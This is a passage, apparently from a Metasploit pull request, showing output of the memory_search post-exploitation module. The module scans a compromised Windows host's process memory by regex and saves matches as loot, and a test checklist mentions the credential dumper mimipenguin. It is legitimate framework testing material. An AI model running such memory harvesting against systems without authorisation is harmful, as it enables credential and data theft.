 false     9104  592   svchost.exe                  x64   0
 false     9120  592   svchost.exe                  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\svchost.exe

[*] Running against the following processes:
        WindowsTerminal.exe (pid: 3028)
        bash.exe (pid: 7720)
        bash.exe (pid: 3916)
        bash.exe (pid: 5688)
        bash.exe (pid: 2956)
        bash.exe (pid: 5452)
        bash.exe (pid: 724)
        bash.exe (pid: 4396)
        bash.exe (pid: 8736)
        bash.exe (pid: 5188)
        python.exe (pid: 1292)

[*] Memory Matches for WindowsTerminal.exe (pid: 3028)
==================================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x00000189D6A97319  127           "GET /putty-memsearch HTTP/1.1\" 200 -.. -..xe    putty-memsearch.[5C       putty-memsearch-te  0x00000189D6A54000   0x000000000004E000
                                   st-rsa.pub   working_resolution.pat"

[*] No regular expression matches were found in memory for bash.exe (pid: 7720).
[*] No regular expression matches were found in memory for bash.exe (pid: 3916).
[*] No regular expression matches were found in memory for bash.exe (pid: 5688).
[*] No regular expression matches were found in memory for bash.exe (pid: 2956).
[*] No regular expression matches were found in memory for bash.exe (pid: 5452).
[*] No regular expression matches were found in memory for bash.exe (pid: 724).
[*] No regular expression matches were found in memory for bash.exe (pid: 4396).
[*] No regular expression matches were found in memory for bash.exe (pid: 8736).
[*] No regular expression matches were found in memory for bash.exe (pid: 5188).
[*] Memory Matches for python.exe (pid: 1292)
=========================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x000002B968B90761  127           "GET /putty-memsearch HTTP/1.1\" 200 -.. -..h.......h.......h....p..h....p..h.......h.......h.  0x000002B968B00000   0x00000000000FF000
                                   ...................0..h....0..h...."
 0x000002B96AF1E131  127           "GET /putty-memsearch HTTP/1.1\" 200 -...-.......p..j.......j...............O.............l.O.  0x000002B96AEC0000   0x0000000000100000
                                   ......j.......O.......j......?i...."
 0x000002B96AF1E5B1  127           "GET /putty-memsearch HTTP/1.1\" 200 -...-.......p..j.................... e,i.................  0x000002B96AEC0000   0x0000000000100000
                                   ..................................."
 0x000002B96AF96DC1  127           "GET /putty-memsearch HTTP/1.1\" 200 -............n.j....p..O....(............................  0x000002B96AEC0000   0x0000000000100000
                                   ...\\Users\\win10\\desktop\\putty-memse"
 0x000002B96AF96E81  127           "GET /putty-memsearch.pub HTTP/1.1\" 200 -....................................................  0x000002B96AEC0000   0x0000000000100000
                                   ..................................."
 0x000002B96AFAB5D0  127           "GET /putty-memsearch HTTP/1.1...0..j....p..j.............\\.O.............t.j................  0x000002B96AEC0000   0x0000000000100000
                                   ....p..j.......j.............\\.O..."
 0x000002B96AFB1DC0  127           "GET /putty-memsearch HTTP/1.1...p3.j.......................O.....l.O.........................  0x000002B96AEC0000   0x0000000000100000
                                   ...........Xp.O.......j..........."

[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_170709.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_299578.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_199269.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_236379.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_079222.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_999172.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_810779.bin
[+] Loot stored to: /Users/sjanusz/.msf4/loot/20240124201604_default_192.168.112.129_memory.dmp_682935.bin
[*] Post module execution completed
```

</details>

**x86** (user)

<details>

```
msf6 post(multi/gather/memory_search) > run session=-1 REGEX='GET /.*' PROCESS_NAMES_GLOB='{python*,zsh*,bash*,[Ww]indows[Tt]erminal*}'

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        WindowsTerminal.exe (pid: 3028)
        bash.exe (pid: 7720)
        bash.exe (pid: 3916)
        bash.exe (pid: 5688)
        bash.exe (pid: 2956)
        bash.exe (pid: 5452)
        bash.exe (pid: 724)
        bash.exe (pid: 4396)
        bash.exe (pid: 8736)
        bash.exe (pid: 5188)
        python.exe (pid: 1292)
        bash.exe (pid: 8332)

[*] No regular expression matches were found in memory for WindowsTerminal.exe (pid: 3028).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 7720).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 3916).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 5688).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 2956).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 5452).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 724).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 4396).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 8736).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 5188).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for python.exe (pid: 1292).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for bash.exe (pid: 8332).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] Post module execution completed
```

</details>

## Verification

- [ ] Start `msfconsole`
- [ ] Get a Windows & Linux session
- [ ] Ensure `mimipenguin` works as expected
- [ ] Ensure you can use the `memory_search` module against both sessions
- [ ] Ensure you get an arch mismatch message when targeting an x64 process from an x86 session and vice-versa